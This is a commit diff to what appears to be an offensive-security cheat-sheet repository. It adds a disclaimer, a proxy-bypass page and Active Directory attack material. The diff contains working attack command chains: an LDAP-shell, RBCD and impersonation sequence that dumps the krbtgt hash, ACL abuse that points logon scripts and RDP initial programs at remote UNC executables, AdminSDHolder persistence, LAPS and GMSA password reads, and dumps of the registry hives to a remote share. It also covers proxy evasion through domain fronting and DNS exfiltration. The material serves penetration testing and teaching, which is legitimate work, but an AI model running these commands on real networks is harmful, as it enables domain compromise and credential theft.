Skip to content

Commit

Permalink
Disclaimer + Proxy + ESC8 without PKINIT + Markdown Fix
Browse files Browse the repository at this point in the history
  • Loading branch information
@swisskyrepo
swisskyrepo committed Dec 11, 2024
1 parent c77236f commit b6666ea
Show file tree
Hide file tree
Showing 7 changed files with 220 additions and 32 deletions.
11 changes: 11 additions & 0 deletions docs/DISCLAIMER.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# DISCLAIMER

The authors and contributors of this repository disclaim any and all responsibility for the misuse of the information, tools, or techniques described herein. The content is provided solely for educational and research purposes. Users are strictly advised to utilize this information in accordance with applicable laws and regulations and only on systems for which they have explicit authorization.

By accessing and using this repository, you agree to:

* Refrain from using the provided information for any unethical or illegal activities.
* Ensure that all testing and experimentation are conducted responsibly and with proper authorization.
* Acknowledge that any actions you take based on the contents of this repository are solely your responsibility.

Neither the authors nor contributors shall be held liable for any damages, direct or indirect, resulting from the misuse or unauthorized application of the knowledge contained herein. Always act mindfully, ethically, and within the boundaries of the law.
62 changes: 57 additions & 5 deletions docs/active-directory/ad-adcs-certificate-services.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,21 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role

## ADCS Enumeration

* netexec: `netexec ldap domain.lab -u username -p password -M adcs`
* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
* certutil: `certutil.exe -config - -ping`, `certutil -dump`
* netexec:
```ps1
netexec ldap domain.lab -u username -p password -M adcs
```
* ldapsearch:
```ps1
ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName
```
* certutil:
```ps1
certutil.exe -config - -ping
certutil -dump
```
## Certificate Enrollment
Expand Down Expand Up @@ -232,11 +244,11 @@ Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
```

## ESC8 - AD CS Relay Attack
## ESC8 - Web Enrollment Relay

> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
Require [SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket/pull/1101) PR #1101

* **Version 1**: NTLM Relay + Rubeus + PetitPotam

Expand Down Expand Up @@ -585,6 +597,46 @@ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
```


### PKINIT ERROR

When the DC does not support **PKINIT** (the pre-authentication allowing to retrieve either TGT or NT Hash using certificate). You will get an error like the following in the tool's output.

```ps1
$ certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
[...]
KDC_ERROR_CLIENT_NOT_TRUSTED (Reserved for PKINIT)
```

There is still a way to use the certificate to takeover the account.

* Open an LDAP shell using the certificate
```ps1
certipy auth -pfx target.pfx -debug -username username -domain domain.local -dns-tcp -dc-ip 10.10.10.10 -ldap-shell
```
* Add a computer for RBCD
```ps1
impacket-addcomputer -dc-ip 10.10.10.10 DOMAIN.LOCAL/User:P@ssw0rd -computer-name "NEWCOMPUTER" -computer-pass "P@ssw0rd123*"
```
* Set the RBCD
```ps1
set_rbcd 'TARGET$' 'NEWCOMPUTER$'
```
* Request a ticket with impersonation
```ps1
impacket-getST -spn 'cifs/target.domain.local' -impersonate 'target$' -dc-ip 10.10.10.10 'DOMAIN.LOCAL/NEWCOMPUTER$:P@ssw0rd123*'
```
* Use the ticket
```ps1
export KRB5CCNAME=DC$.ccache
impacket-secretsdump.py 'target$'@target.domain.local -k -no-pass -dc-ip 10.10.10.10 -just-dc-user 'krbtgt'
```
## UnPAC The Hash
Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
Expand Down
7 changes: 6 additions & 1 deletion docs/active-directory/ad-adds-acl-ace.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -106,7 +106,7 @@ An **Access Control List (ACL)** is a collection of Access Control Entries (ACEs
rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd"
```

* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script :
* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script :
* Windows/Linux:
```ps1
bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.bat'
Expand Down Expand Up @@ -140,6 +140,7 @@ An **Access Control List (ACL)** is a collection of Access Control Entries (ACEs
> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/
:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable.

* Windows/Linux:
```ps1
bloodyAD --host 10.10.10.10 -d example.lab -u hacker -p MyPassword123 set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe'
Expand Down Expand Up @@ -196,6 +197,7 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
## WriteOwner

An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they wants.

* Windows/Linux:
```ps1
bloodyAD --host my.dc.corp -d corp -u devil_user1 -p 'P@ssword123' set owner target_object devil_user1
Expand All @@ -210,6 +212,7 @@ This ACE can be abused for an Immediate Scheduled Task attack, or for adding a u
## ReadLAPSPassword

An attacker can read the LAPS password of the computer account this ACE applies to.

* Windows/Linux:
```ps1
bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Expand All @@ -222,6 +225,7 @@ An attacker can read the LAPS password of the computer account this ACE applies
## ReadGMSAPassword

An attacker can read the GMSA password of the account this ACE applies to.

* Windows/Linux:
```ps1
bloodyAD -u john.doe -d bloody -p Password512 --host 192.168.10.2 get object 'gmsaAccount$' --attr msDS-ManagedPassword
Expand All @@ -239,6 +243,7 @@ An attacker can read the GMSA password of the account this ACE applies to.
## ForceChangePassword

An attacker can change the password of the user this ACE applies to:

* Windows/Linux:
```ps1
# Using bloodyAD with pass-the-hash
Expand Down
2 changes: 2 additions & 0 deletions docs/active-directory/ad-adds-enumerate.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,8 @@ Use the appropriate data collector to gather information for **BloodHound** or *
* [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
* [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
* [c3c/ADExplorerSnapshot.py](https://github.com/c3c/ADExplorerSnapshot.py) - for local Active Directory (Generate BloodHound compatible JSON from AD Explorer snapshot)


**Examples**:

Expand Down
59 changes: 36 additions & 23 deletions docs/active-directory/ad-adds-groups.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -28,14 +28,17 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).

E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.

* Windows/Linux:
```ps1
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
# Clean up after
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
```

* Windows only:
```ps1
# Add a user to the AdminSDHolder group:
Expand Down Expand Up @@ -99,36 +102,46 @@ This groups grants the following privileges :
- SeBackup privileges
- SeRestore privileges
* Get members of the group:
* Windows/Linux:
Get members of the group:
* Windows/Linux:
```ps1
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive
```
* Windows only:
* Windows only:
```ps1
PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
```
* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
```ps1
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```
* Retrieve sensitive files
```ps1
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
```
* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
```ps1
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
```
* Retrieve SAM,SECURITY and SYSTEM hives
* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
```ps1
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
```

Retrieve sensitive files

```ps1
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
```

Retrieve content of AutoLogon in the `HKLM\SOFTWARE` hive

```ps1
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
```

Retrieve `SAM`,`SECURITY` and `SYSTEM` hives

* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`


## References
Expand Down
6 changes: 3 additions & 3 deletions docs/active-directory/ad-roasting-timeroasting.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,8 +8,8 @@
hashcat -m 31300 ntp-hashes.txt
```
## References
* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory)
* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
* [On the Applicability of the Timeroasting Attack - snovvcrash - December 8, 2024](https://snovvcrash.rocks/2024/12/08/applicability-of-the-timeroasting-attack.html)
* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory)
105 changes: 105 additions & 0 deletions docs/redteam/evasion/proxy-bypass.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,105 @@
# Proxy Bypass

> An HTTP proxy server acts as an intermediary between a client (like a web browser) and a web server. It processes client requests for web resources, fetches them from the destination server, and returns them to the client.
## Summary

* [Methodology](#methodology)
* [Discover Proxy Configuration](#discover-proxy-configuration)
* [PAC Proxy](#pac-proxy)
* [Common Bypass](#common-bypass)
* [References](#references)

## Methodology

### Discover Proxy Configuration

* Windows, in the registry key `DefaultConnectionSettings`

```ps1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
```
* Windows:
```ps1
netsh winhttp show proxy
```
* Linux, in the environment variables `http_proxy` and `https_proxy`
```ps1
env
cat /etc/profile.d/proxy.conf
```
### PAC Proxy
PAC (Proxy Auto-Configuration) is a method to automatically determine whether web traffic should go through a proxy server. It uses a .pac file that contains a JavaScript function called `FindProxyForURL(url, host)`.
* proxy.pac
* wpad.dat
**Example**:
```ps1
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, '.example.com')) {
return 'DIRECT';
}
return 'PROXY proxy.example.com:8080';
}
```

**Tools**:

* [PortSwigger - Proxy Auto Config](https://portswigger.net/bappstore/7b3eae07aa724196ab85a8b64cd095d1) - This extension automatically configures Burp upstream proxies to match desktop proxy settings. This includes support for Proxy Auto-Config (PAC) scripts.

### Common Bypass

* Try several way to reach the Internet
* IP address
* Domain categorized in Health/Finance

* Use another proxy reachable in the same environment

* Weak regular expression for URL can be abused to bypass the proxy configuration

```ps1
user:pass@domain/endpoint?parameter#hash
e.g: microsoft.com:[email protected]/microsoft.com?microsoft.com#microsoft.com
```
* Trusted Websites: [Living Off Trusted Sites (LOTS) Project](https://lots-project.com/)
* Amazon Cloud: AWS endpoints
* Microsoft Cloud: Azure endpoints
* Google Cloud: GCP endpoints
* live.sysinternals.com
* User-Agents
* Tools related User-Agent: curl, python, powershell
```ps1
User-Agent: curl/8.11.0
User-Agent: python-requests/2.32.3
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; fr-FR) WindowsPowerShell/5.1.26100.2161
```
* Platform related User-Agent: Android/iOS/Tablet
```ps1
Mozilla/5.0 (Linux; Android 14; Pixel 9 Build/AD1A.240905.004; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/129.0.6668.78 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/484.0.0.63.83;IABMV/1;]
Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBAV/485.1.0.45.110;FBBV/665337277;FBDV/iPhone17,1;FBMD/iPhone;FBSN/iOS;FBSV/18.0.1;FBSS/3;FBCR/;FBID/phone;FBLC/it_IT;FBOP/80]
```
* Domain Fronting
* Protocols
* TCP
* Websocket (HTTP)
* DNS Exfiltration
## References
* [Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’ - Thomas Grimée - August 17, 2021](https://blog.nviso.eu/2021/08/17/proxy-managed-by-enterprise-no-problem-abusing-pac-and-the-registry-to-get-burpin/)
* [Proxy: Internal Proxy - MITRE ATT&CK - March 14, 2020](https://attack.mitre.org/versions/v16/techniques/T1090/001/)

0 comments on commit b6666ea

Please sign in to comment.